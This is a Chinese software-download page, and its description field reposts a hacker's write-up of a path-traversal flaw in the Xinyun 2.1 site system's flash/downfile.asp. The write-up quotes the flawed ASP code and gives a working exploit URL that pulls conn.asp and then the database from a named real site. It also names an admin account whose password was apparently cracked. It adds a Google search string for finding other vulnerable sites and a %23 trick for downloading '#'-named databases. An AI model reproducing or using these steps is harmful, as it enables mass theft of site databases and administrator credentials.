虚拟主机 域名注册
  酷源码下载 设为首页
加入收藏
联系我们
 首 页  最近更新社区论坛
 源码: ASP 源码 | PHP 源码 | JSP 源码 | CGI 源码 | .NET源码 | 工具软件 | 建站素材 | 服务器类 | 电子书籍 | 黑客专区 | 番茄专栏
 
 
栏目导航
入侵检测 安全工具
加密解密 溢出攻击
木马间谍 拒绝服务
探嗅监听 动画教程
网络工具 Q Q专栏
常用工具
热门下载
 
AutoHotkey V1.0.47.0..
PHPMaker V5.0.2.1_是..
Flash Decompiler V1...
GreatNews V1.0 Beta ..
bkViewer 4.3b2_作为专..
暴风影音 3.4[3.08.03..
Windows Live Messeng..
超级巡警 V4.0 RC2 Bu..
IconsExtract 1.44_图..
NNT公司管理系统 免费..
房地产源码/地产公司建..
手机数码产品网上交易..
  >>>您当前的位置:酷源码下载 -> 黑客专区 -> 入侵检测
友情检测广西黑客联盟
运行环境 Win9x/NT/2000/XP/2003/
整理时间 2006-11-6 11:35:49
软件星级
软件语言 简体中文
软件类型 免费源码
授权方式 免费版
软件大小 14.69 MB
相关连接 zouxueneng@kyuanma.com   官方主页   没有预览图片    [收 藏]
下载统计
下载地址
点击此处立即下载 - 友情检测广西黑客联盟
软件简介
  友情检测广西黑客联盟


                            
                            菜鸟丫丫    QQ:122727223

新云2.1漏洞解析
flash/downfile.asp过滤不严导致可下载任意文件。(看一下有没有这个页面)呵呵

url = Replace(Replace(Replace(Request("url"), "'", ""), "%", ""), "\", "/")

变量URL从客户端提交的路径获取,仅过滤了"'","%"和"\"
看下面

If Len(url) > 3 Then
If Left(url,1) = "/" Then
  Response.Redirect url
End If
If InStr(url,"../")<>0 Then
  Response.Redirect url
End If
strUrl = Left(url,10)
If InStr(strUrl, "://") > 0 Then
  Response.Redirect url
End If
If InStr(url, "/") > 0 Then
  strPath = Server.MapPath(".") & "\" & url
  strPath = Replace(strPath, "/", "\")
  Call downThisFile(strPath)
Else
  Response.Redirect url
End If
End If
如果在URL中包含"..\"会被转换成"../",然后跳转。


fileName = split(thePath,"\")(UBound(split(thePath,"\")))
下载文件名以"\"为标记被分割。
懂点代码的都应该知道怎么利用了吧
构造利用语句提交

flash/downfile.asp?url=uploadfile/../../conn.asp

对应的地址为:http://www.xzws.cn/flash/downfile.asp?url=uploadfile/../../conn.asp

将其下载。查看

数据库为:\database\xzws.mdb

其地址为:http://www.xzws.cn/database\xzws.mdb

我已经下载好了用数据库浏览器打开。

用这个ID登陆 hpotter 密码自己去跑 我已经跑出来了。

后台密码和前台不同 看看有其他地方没有 很容易想到论坛blog等等 呵呵,站长 进后台 呵呵。轻松搞定

 
 版权所有:就是快快
 官方网站:94KK.Com

呵呵。

这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了

如:#xzws.mdb 改成%23xzws.mdb

如此这般,数据库拿到手了 拿管理员进入。。。。之后就不做演示了。。。。友情检测,已通知管理员。


软件评论     (评论内容只代表网友观点,与本站立场无关!) 发表评论…
相关软件
天天DV网智能友情链接管理系统 v3.0
50004自助友情连接系统 v1.1
新鲜志友情链接程序
50004自助友情连接系统 v1.0
特恩职能友情连接系统
天天DV网智能友情链接管理系统 v2.8
天天DV网智能友情链接管理系统 v2.7
友情检测东方卫士网站
中搜索:友情检测广西黑客联盟
中搜索:友情检测广西黑客联盟
中搜索:友情检测广西黑客联盟
中搜索:友情检测广西黑客联盟
中搜索:友情检测广西黑客联盟
中搜索:友情检测广西黑客联盟
下载说明
为了达到最快的下载速度,推荐使用[迅雷]下载本站软件。
请一定升级到最新版[WinRAR3.8]才能正常解压本站提供的软件!
如果您发现该软件不能下载,请点击报告错误谢谢!
站内提供的所有源码软件均是由网上搜集,若侵犯了你的版权利益,敬请来信通知我们!
网站制作 - 本站招聘 - 网站帮助 - 广告合作 - 下载声明 - 联系我们 - 友情连接 - 网站地图